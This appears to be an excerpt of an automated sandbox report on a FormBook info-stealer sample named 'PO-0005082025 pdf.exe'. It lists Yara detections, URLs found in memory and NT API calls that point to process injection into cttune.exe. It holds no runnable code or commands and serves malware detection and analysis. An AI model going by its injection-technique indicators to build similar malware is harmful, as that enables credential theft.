Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
Source: cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.PO-0005082025 pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO-0005082025 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2977853967.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2978728918.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2292265378.00000000018B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2978800956.0000000005010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2978571194.0000000002970000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2293444782.0000000001E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0042CCC3 NtClose,	6_2_0042CCC3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982B60 NtClose,LdrInitializeThunk,	6_2_01982B60
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_01982DF0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_01982C70
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019835C0 NtCreateMutant,LdrInitializeThunk,	6_2_019835C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01984340 NtSetContextThread,	6_2_01984340
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01984650 NtSuspendThread,	6_2_01984650
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982B80 NtQueryInformationFile,	6_2_01982B80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982BA0 NtEnumerateValueKey,	6_2_01982BA0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982BF0 NtAllocateVirtualMemory,	6_2_01982BF0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982BE0 NtQueryValueKey,	6_2_01982BE0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982AB0 NtWaitForSingleObject,	6_2_01982AB0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982AD0 NtReadFile,	6_2_01982AD0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982AF0 NtWriteFile,	6_2_01982AF0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982DB0 NtEnumerateKey,	6_2_01982DB0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982DD0 NtDelayExecution,	6_2_01982DD0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982D10 NtMapViewOfSection,	6_2_01982D10
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982D00 NtSetInformationFile,	6_2_01982D00
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982D30 NtUnmapViewOfSection,	6_2_01982D30
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982CA0 NtQueryInformationToken,	6_2_01982CA0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982CC0 NtQueryVirtualMemory,	6_2_01982CC0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982CF0 NtOpenProcess,	6_2_01982CF0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982C00 NtQueryInformationProcess,	6_2_01982C00
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982C60 NtCreateKey,	6_2_01982C60
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982F90 NtProtectVirtualMemory,	6_2_01982F90
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982FB0 NtResumeThread,	6_2_01982FB0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982FA0 NtQuerySection,	6_2_01982FA0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982FE0 NtCreateFile,	6_2_01982FE0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982F30 NtCreateSection,	6_2_01982F30
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982F60 NtCreateProcessEx,	6_2_01982F60
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982E80 NtReadVirtualMemory,	6_2_01982E80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982EA0 NtAdjustPrivilegesToken,	6_2_01982EA0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982EE0 NtQueueApcThread,	6_2_01982EE0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982E30 NtWriteVirtualMemory,	6_2_01982E30
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01983090 NtSetValueKey,	6_2_01983090
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01983010 NtOpenDirectoryObject,	6_2_01983010
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019839B0 NtGetContextThread,	6_2_019839B0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01983D10 NtOpenProcessToken,	6_2_01983D10
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01983D70 NtOpenThread,	6_2_01983D70
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05294650 NtSuspendThread,LdrInitializeThunk,	11_2_05294650
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05294340 NtSetContextThread,LdrInitializeThunk,	11_2_05294340
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292D30 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_05292D30
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292D10 NtMapViewOfSection,LdrInitializeThunk,	11_2_05292D10
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_05292DF0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292DD0 NtDelayExecution,LdrInitializeThunk,	11_2_05292DD0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292C60 NtCreateKey,LdrInitializeThunk,	11_2_05292C60
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_05292C70
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292CA0 NtQueryInformationToken,LdrInitializeThunk,	11_2_05292CA0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292F30 NtCreateSection,LdrInitializeThunk,	11_2_05292F30
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292FB0 NtResumeThread,LdrInitializeThunk,	11_2_05292FB0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292FE0 NtCreateFile,LdrInitializeThunk,	11_2_05292FE0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292E80 NtReadVirtualMemory,LdrInitializeThunk,	11_2_05292E80
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292EE0 NtQueueApcThread,LdrInitializeThunk,	11_2_05292EE0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292B60 NtClose,LdrInitializeThunk,	11_2_05292B60
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292BA0 NtEnumerateValueKey,LdrInitializeThunk,	11_2_05292BA0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292BE0 NtQueryValueKey,LdrInitializeThunk,	11_2_05292BE0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_05292BF0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292AF0 NtWriteFile,LdrInitializeThunk,	11_2_05292AF0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292AD0 NtReadFile,LdrInitializeThunk,	11_2_05292AD0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052935C0 NtCreateMutant,LdrInitializeThunk,	11_2_052935C0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052939B0 NtGetContextThread,LdrInitializeThunk,	11_2_052939B0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292D00 NtSetInformationFile,	11_2_05292D00
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292DB0 NtEnumerateKey,	11_2_05292DB0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292C00 NtQueryInformationProcess,	11_2_05292C00
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292CF0 NtOpenProcess,	11_2_05292CF0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292CC0 NtQueryVirtualMemory,	11_2_05292CC0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292F60 NtCreateProcessEx,	11_2_05292F60
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292FA0 NtQuerySection,	11_2_05292FA0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292F90 NtProtectVirtualMemory,	11_2_05292F90
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292E30 NtWriteVirtualMemory,	11_2_05292E30
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292EA0 NtAdjustPrivilegesToken,	11_2_05292EA0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292B80 NtQueryInformationFile,	11_2_05292B80
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05292AB0 NtWaitForSingleObject,	11_2_05292AB0
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05293010 NtOpenDirectoryObject,	11_2_05293010
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05293090 NtSetValueKey,	11_2_05293090
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05293D10 NtOpenProcessToken,	11_2_05293D10
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05293D70 NtOpenThread,	11_2_05293D70
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03259330 NtCreateFile,	11_2_03259330
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03259770 NtAllocateVirtualMemory,	11_2_03259770
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03259620 NtClose,	11_2_03259620
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03259580 NtDeleteFile,	11_2_03259580
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03259490 NtReadFile,	11_2_03259490
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0510F903 NtResumeThread,	11_2_0510F903

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_0581AAC4	0_2_0581AAC4
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_0581C110	0_2_0581C110
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_058160B7	0_2_058160B7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_058160C8	0_2_058160C8
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_0798A708	0_2_0798A708
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_07985E60	0_2_07985E60
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_07982D70	0_2_07982D70
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_0798D680	0_2_0798D680
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_0798A6F8	0_2_0798A6F8
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_0798F5C8	0_2_0798F5C8
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_07985298	0_2_07985298
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_07985248	0_2_07985248
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_0798F190	0_2_0798F190
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_0798DEF0	0_2_0798DEF0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_07985E50	0_2_07985E50
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_07982D62	0_2_07982D62
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_07982A88	0_2_07982A88
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_0798DAB8	0_2_0798DAB8
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_0798DAA8	0_2_0798DAA8
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_07982A78	0_2_07982A78
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_079A4600	0_2_079A4600
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00401C66	6_2_00401C66
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00418D33	6_2_00418D33
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00403045	6_2_00403045
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00403050	6_2_00403050
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0040E8EA	6_2_0040E8EA
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0040E8F3	6_2_0040E8F3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0040296B	6_2_0040296B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00402970	6_2_00402970
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00404A47	6_2_00404A47
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0042F2B3	6_2_0042F2B3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00401440	6_2_00401440
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00403420	6_2_00403420
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0041056A	6_2_0041056A
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00410573	6_2_00410573
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_004025C6	6_2_004025C6
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_004025D0	6_2_004025D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00402E2E	6_2_00402E2E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00402E30	6_2_00402E30
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00416F1E	6_2_00416F1E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00416F23	6_2_00416F23
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00410793	6_2_00410793
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0040E79A	6_2_0040E79A
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0040E7A3	6_2_0040E7A3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A041A2	6_2_01A041A2
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A101AA	6_2_01A101AA
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A081CC	6_2_01A081CC
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EA118	6_2_019EA118
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01940100	6_2_01940100
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D8158	6_2_019D8158
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E2000	6_2_019E2000
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A103E6	6_2_01A103E6
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195E3F0	6_2_0195E3F0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0A352	6_2_01A0A352
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D02C0	6_2_019D02C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0274	6_2_019F0274
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A10591	6_2_01A10591
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950535	6_2_01950535
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019FE4F6	6_2_019FE4F6
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F4420	6_2_019F4420
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A02446	6_2_01A02446
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194C7C0	6_2_0194C7C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01974750	6_2_01974750
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950770	6_2_01950770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196C6E0	6_2_0196C6E0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A1A9A6	6_2_01A1A9A6
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0	6_2_019529A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01966962	6_2_01966962
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019368B8	6_2_019368B8
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E8F0	6_2_0197E8F0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01952840	6_2_01952840
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195A840	6_2_0195A840
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A06BD7	6_2_01A06BD7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0AB40	6_2_01A0AB40
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194EA80	6_2_0194EA80
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01968DBF	6_2_01968DBF
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194ADE0	6_2_0194ADE0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019ECD1F	6_2_019ECD1F
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195AD00	6_2_0195AD00
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0CB5	6_2_019F0CB5
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01940CF2	6_2_01940CF2
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950C00	6_2_01950C00
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CEFA0	6_2_019CEFA0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01942FC8	6_2_01942FC8
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01970F30	6_2_01970F30
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F2F30	6_2_019F2F30
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01992F28	6_2_01992F28
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C4F40	6_2_019C4F40
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01962E90	6_2_01962E90
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0CE93	6_2_01A0CE93
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0EEDB	6_2_01A0EEDB
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0EE26	6_2_01A0EE26
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950E59	6_2_01950E59
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195B1B0	6_2_0195B1B0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A1B16B	6_2_01A1B16B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193F172	6_2_0193F172
